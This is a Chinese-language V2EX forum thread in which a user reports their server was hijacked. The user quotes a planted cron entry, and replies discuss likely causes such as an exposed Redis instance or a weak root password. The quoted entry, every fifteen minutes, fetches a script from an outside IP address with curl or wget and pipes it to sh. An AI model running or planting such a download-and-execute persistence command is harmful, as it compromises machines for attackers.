首页 注册 登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
广告
densuc
V2EX  ›  问与答

我也中招了,服务器被抓肉鸡了

  •   
  •   densuc · 2019-12-31 11:11:16 +08:00 · 2690 次点击
    这是一个创建于 1790 天前的主题,其中的信息可能已经有所发展或是发生改变。

    cron 里被植入:

    */15 * * * * (/usr/bin/qjowfa8||/usr/libexec/qjowfa8||/usr/local/bin/qjowfa8||/tmp/qjowfa8||curl -m180 -fsSL http://157.245.59.230:8000/i.sh||wget -q -T180 -O- http://157.245.59.230:8000/i.sh) | sh

    大佬们有什么头绪吗?大概是个挖矿脚本? 重装 ing....

  • qjowfa8
  • usr
  • bin
  • fssl
    4 条回复    2019-12-31 11:59:59 +08:00
    R18
        1
    R18  
       2019-12-31 11:16:55 +08:00
    Redis 开了公网没密码
    luvroot
        2
    luvroot  
       2019-12-31 11:28:18 +08:00
    /usr/bin/qjowfa8 把这个搞下来看一下
    densuc
        3
    densuc  
    OP
       2019-12-31 11:48:45 +08:00
    @R18 可能是我 root 密码太弱的原因,我没有安装 Redis。。。

    @luvroot 我已经重装了。。。不过在新系统上运行了,好像暂时是个空文件,可能要挖矿后才会写入?
    jasonyang9
        4
    jasonyang9  
       2019-12-31 11:59:59 +08:00
    类似的,前天在家里弄了台旧笔记本配上 CentOS 7,PPPoE 拨号,IP Forwarding 和 Masquerading,当然还有 Firewalld,充当路由器玩玩的,帐密登录,心想第二天再改 RSA 密钥登录吧,想不到当晚就被黑了。早上起来看到 CPU 基本泡满,哈哈,还好家里其它设备没影响。立马下线重装。。。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1412 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 31ms · UTC 17:06 · PVG 01:06 · LAX 09:06 · JFK 12:06
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.